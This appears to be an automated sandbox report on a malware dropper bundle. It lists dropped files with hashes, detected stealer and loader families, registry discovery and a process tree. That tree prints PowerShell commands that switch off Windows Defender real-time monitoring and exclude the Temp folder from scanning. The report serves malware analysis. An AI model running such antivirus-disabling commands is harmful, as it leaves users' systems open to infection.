SHA1 4f28da2d30710389cabf10385cb8dc5cbf4be74a
SHA256 6fbe7d2d78413b54c593100e706e727f771714e2fa1b584bdc57836b1bd44d60
SHA512 f6aa58bbfd5f976a76da7b12d60d63326d6d78996cb849e0d4075a7f1ea6ce9eb69d90ec5c68e27de9ab4ec4625090a575f2e3b56ff7e28463fabcaa076c4ddd

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10799545d143108.exe

MD5 6bddb7edd2648c177e0ef423cc7df23f
SHA1 d83a67835d694dc9d2726794e9c0a1d10bb1c06a
SHA256 af86823aa88c173cb727965d8a7a7d336c4d47e8d4286e0c22e2f2b7ef314e35
SHA512 761e1bd36d6ad0ff68f53784e34a3a34d936e1ec670a7a3692ad20d3bfde20484a593ababf1559ed85590b2481eaba4849b15022c6c0586dbe30237790f4a20a

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10eb606bd1d021d.exe

MD5 99471e8043cb5f141962e1cfe12d44f4
SHA1 57c6baf415f892dfa82c206c1380a34130dad19d
SHA256 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
SHA512 a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1001440e7e09.exe

MD5 a66e417ccbb28f68b13711bcfc2c4f9f
SHA1 d0076ec3fd9c50816e3385f1d4ce6231411a2f19
SHA256 91bc4939340bf81d9a1c4e8d5b58717691070e67f2a802fe8b6e5f6f6af39f59
SHA512 215779aa9782dc3568b3463967bab83629c1b84d0fec319f25ec98c8c51e460ad74bcd0261f80690c116139e20b9ff12a8a30777e372fe5eefc770dd35fe0f32

\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed109189c07b.exe

MD5 5b3913c5aaf3e1a91ca73679603ec70b
SHA1 1df5b353c591b14989fae254fb47a529aadd3338
SHA256 8e554195273cc328d37d7e255cbaac6589eb44d596e6e2fea6d3766bf2908d7b
SHA512 c90d8d68591478d095ce86ae5c0c4f654023937d31c35390d3c622ecd2e8c4b9a5b3598cfe49419c094afcb699b95f489016b39799db4949d976d814a05efae3

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed103b2f384c2a.exe

MD5 5d436a862c018c54ce2427968c556325
SHA1 97d03f2ed1c32b1de5467414a1c2fea6eb86404a
SHA256 060b9cbca548f4fbd738d79b735852476783b7bce3b373ec620b31fb9f8e39dc
SHA512 2c16938ca1a944b36f944d74ffdb5f6ec4c5f8a49688d6746d966cafcd55287b2794b010875bc3868b3a8e7a587b0160ee564244e98b61e8a59b978954b2ba78

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed1015ba90d2.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

memory/2848-106-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2848-105-0x0000000064940000-0x0000000064959000-memory.dmp

memory/2848-104-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2848-103-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2848-101-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2848-97-0x0000000000400000-0x000000000051C000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed10b607271059cb7.exe

MD5 b84f79adfccd86a27b99918413bb54ba
SHA1 06a61ab105da65f78aacdd996801c92d5340b6ca
SHA256 6913b6cc93ab1fb509ab7459d6158be6f1b03ab06d2ed41782b86838bd504c49
SHA512 99139ce83106810b213e1d89a2d017e824859a48784c9b04adf08314eeacc20b8b22e64349f4609eaf8d47b8a3c35b0fb3b4a270c29f090d2e4d3e3ca3455f38

memory/2096-139-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1804-143-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2956-147-0x0000000000400000-0x000000000042C000-memory.dmp

memory/920-151-0x0000000000140000-0x0000000000148000-memory.dmp

memory/1924-156-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-KUV2C.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\73VI9VBA1AV1D85DBFS4.temp

MD5 0dc1365502c44515e96f622519c9ac35
SHA1 b68dd44ba5742fa1b4eecc3ab44bfaee6e672708
SHA256 6db77c8b0dd920072dbaa9c3463580f6f9541d356e595c6cc8e60fa5049649df
SHA512 a17cf3abcec2170fa3d5b1d6c1d3230c585d0559451d15c33a25481fbe97ac2564f7c5917fe33a17e2c252a30a4ffc3106866d3eab2047fa07a137343e9b557e

memory/2856-146-0x00000000002D0000-0x0000000000312000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zS078C18A6\Wed106168c8ce90b57b8.exe

MD5 c7cd0def6982f7b281c6a61d29eec4be
SHA1 f9f600d70d60cf79563e84cec0b883fa3f541690
SHA256 b2525fcbe771148a6c9b9db5786b8ab833391684eb1ac6152e0a311b2a7f3ab9
SHA512 370c2bde411f188575177ca0821e5920496220785a6aac2e40b2a8d4a0f3151b5bca5e6e90688ba02780bbe1ea0bc1894588b10ff24e2c510254e38c0355b13b

C:\Users\Admin\AppData\Local\Temp\is-PST3N.tmp\Wed10fa57e769925f6.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

C:\Users\Admin\AppData\Local\Temp\is-NM1R6.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 1afff8d5352aecef2ecd47ffa02d7f7d
SHA1 8b115b84efdb3a1b87f750d35822b2609e665bef
SHA256 c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1
SHA512 e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb

C:\Users\Admin\AppData\Local\Temp\Cab1130.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

C:\Program Files (x86)\Gparted\Build.exe

MD5 c874508845d1c0bb486f5e41af8de480
SHA1 3ac7e246934ba74c1018d50138bea77b035d6f90
SHA256 4793a9e954f00007a2f352648cddbc30add3ff4b7f22c3e1500d3671b0eb36be
SHA512 80daa52fea184748c4b858af4c7a676dddddf4c3cfdfada44917abddb0495ab22a9728800ea7f408fb3e66c269eda9df2462a9f82cf6a57c254d6c233c46f758

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\5DBRLF1UXEIVTWFTQDBG.temp

MD5 faf6aba7a04689b246828a94e00fafcb
SHA1 ec2905774af3306e59181440bdee464135e6ea1d
SHA256 0964891857b14ef95978e85cca9e9130ae316ec7b45b89a187dd3a10b42f99a5
SHA512 fd6867ea9016a28bba0bc1599b11bd239628b672db294038a4bdd5960cc9b330085148fb03f8a95a609ddd15471e1b1585865a4fe554fa7cc0293f6c977befd6

C:\Program Files (x86)\Gparted\gimagex.exe

MD5 85199ea4a530756b743ad4491ea84a44
SHA1 0842cd749986d65d400a9605d17d2ed7a59c13cc
SHA256 3ea24d7899169c28d505233e13b9c92b51cd1181be299487392700d29e13b9aa
SHA512 b82b1c0ba24fa3e4c1f5309eee4cc6be0dfcc20f64886a40e4eb35d804f36af864b3e4218d7f27f439fa45659af0d69410798c9b3d1e5cab5a259759b7ad1f99

C:\Users\Admin\AppData\Local\Temp\Tar4329.tmp

MD5 4ea6026cf93ec6338144661bf1202cd1
SHA1 a1dec9044f750ad887935a01430bf49322fbdcb7
SHA256 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8
SHA512 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 fd2727132edd0b59fa33733daa11d9ef
SHA1 63e36198d90c4c2b9b09dd6786b82aba5f03d29a
SHA256 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e
SHA512 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 fafbf2197151d5ce947872a4b0bcbe16
SHA1 a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020
SHA256 feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71
SHA512 acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-UNCCS.tmp\Wed10fa57e769925f6.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3132 wrote to memory of 2020 N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe
PID 2020 wrote to memory of 3340 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4964 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3340 wrote to memory of 1156 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4964 wrote to memory of 3464 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2020 wrote to memory of 3412 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4536 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 3612 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 3972 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4644 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2116 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 876 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 1356 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2668 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 2484 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 228 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 4936 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2020 wrote to memory of 3068 N/A C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2668 wrote to memory of 1692 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe
PID 3972 wrote to memory of 1600 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a0affb29d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed101f2195049.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10b607271059cb7.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10fa57e769925f6.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed103b2f384c2a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10d7483856.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed106168c8ce90b57b8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1095e8d3cef4ec773.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1001440e7e09.exe /mixtwo

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed109189c07b.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10eb606bd1d021d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10a80f141fb08.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10799545d143108.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed10520e75c2eb.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Wed1015ba90d2.exe

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe

Wed10eb606bd1d021d.exe

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

Wed10fa57e769925f6.exe

C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-GQIH7.tmp\Wed10fa57e769925f6.tmp" /SL5="$70268,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe"

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe" -u

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe

"C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-UNCCS.tmp\Wed10fa57e769925f6.tmp

"C:\Users\Admin\AppData\Local\Temp\is-UNCCS.tmp\Wed10fa57e769925f6.tmp" /SL5="$B0216,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10fa57e769925f6.exe" /SILENT

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 56.jpgamehome.com udp
US 8.8.8.8:53 tweakballs.com udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\setup_install.exe

MD5 b6140096778ba8327684188903b829f9
SHA1 a8c542ed9b1c29d07cc5c955ef29f3f92531887c
SHA256 32096a36f4ce1bfed14e19eedfd6b882e997c38241a182142332a2bf4c9dbb64
SHA512 7f8fa614fae4aa6622d28f228f5b39a90ebf66f598acb06bbc2a219aeab6a1409393dcd82a03b60e418671c66f9c3da9510fdea9a3aa19716daf9385925f0c6f

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libwinpthread-1.dll

MD5 1e0d62c34ff2e649ebc5c372065732ee
SHA1 fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256 509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
SHA512 3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libcurl.dll

MD5 d09be1f47fd6b827c81a4812b4f7296f
SHA1 028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA256 0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512 857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libstdc++-6.dll

MD5 5e279950775baae5fea04d2cc4526bcc
SHA1 8aef1e10031c3629512c43dd8b0b5d9060878453
SHA256 97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512 666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libgcc_s_dw2-1.dll

MD5 9aec524b616618b0d3d00b27b6f51da1
SHA1 64264300801a353db324d11738ffed876550e1d3
SHA256 59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA512 0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\libcurlpp.dll

MD5 e6e578373c2e416289a8da55f1dc5e8e
SHA1 b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA256 43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA512 9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed1015ba90d2.exe

MD5 4f11e641d16d9590ac1c9f70d215050a
SHA1 75688f56c970cd55876f445c8319d7b91ce556fb
SHA256 efbf94261833d1318a16120c706a80c4853697ce85ffa714e7f5afca1d19e1c0
SHA512 b7358554587bce2ffe5cf5ac7ea6d590b810db2def56369010a7f10eacc89dd9d4c4c42b5bf113372a146d3a3cc55a1f21f269deadec5d483f51236318404007

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10799545d143108.exe

MD5 6bddb7edd2648c177e0ef423cc7df23f
SHA1 d83a67835d694dc9d2726794e9c0a1d10bb1c06a
SHA256 af86823aa88c173cb727965d8a7a7d336c4d47e8d4286e0c22e2f2b7ef314e35
SHA512 761e1bd36d6ad0ff68f53784e34a3a34d936e1ec670a7a3692ad20d3bfde20484a593ababf1559ed85590b2481eaba4849b15022c6c0586dbe30237790f4a20a

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10a80f141fb08.exe

MD5 f4a5ef05e9978b2215c756154f9a3fdb
SHA1 c933a1debeea407d608464b33588b19c299295c6
SHA256 d3a6b444ced1db9e9452bb5fc1f652b0d6b519948ed2e6e348036d2c25147f69
SHA512 f2d11f706d552c21b75f36c8e02edcb9251c95298986b17d48fb179f2f8d1e2e7ef99de9485ba7ee92dd118ad5759b6fa82197319a40b45044fdbdf039582d77

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed109189c07b.exe

MD5 5b3913c5aaf3e1a91ca73679603ec70b
SHA1 1df5b353c591b14989fae254fb47a529aadd3338
SHA256 8e554195273cc328d37d7e255cbaac6589eb44d596e6e2fea6d3766bf2908d7b
SHA512 c90d8d68591478d095ce86ae5c0c4f654023937d31c35390d3c622ecd2e8c4b9a5b3598cfe49419c094afcb699b95f489016b39799db4949d976d814a05efae3

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10520e75c2eb.exe

MD5 18c977c8af2d6a4491109f686b8430ec
SHA1 4265fe935115de077d22f3279b1cf5626a28a623
SHA256 cec7c81038db8fe58fb50abd445d9b48d7b0d575a5c934f7a7d5c53a0be8a0ac
SHA512 4a56c2356b7c41fc9dbd36e02f103f9938d0fe221dd5149705f9ea58e53af6d8da58e1216a77ff792c8ead8aca7a1c052c8d204435e7f4364e3e4cd5b9d54f72

C:\Users\Admin\AppData\Local\Temp\7zSC3C7A6F7\Wed10eb606bd1d021d.exe

MD5 99471e8043cb5f141962e1cfe12d44f4
SHA1 57c6baf415f892dfa82c206c1380a34130dad19d
SHA256 1946616cacfd8688bb722a2b1a6a0df117f9d8d877c675704602c2e8301dd509
SHA512 a31de569cf29efa20fad89a43ac55e6f93562d2204158d1d48f4c05f047fc59a6869a90a42184442e88d3b0d611e74c82d420eaccf9cfa08c6d4227c568baf41


Analysis: behavioral1

Detonation Overview

Submitted

2024-11-07 05:21

Reported

2024-11-07 05:23

Platform

win7-20240903-en

Max time kernel

149s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\604cb7570b566bf713d6b7a9f54a69828acf397cdccb479a29353cb4a57c617f.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Glupteba

loader dropper glupteba

Glupteba family

glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Metasploit family

metasploit

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

Windows security bypass

evasion trojan
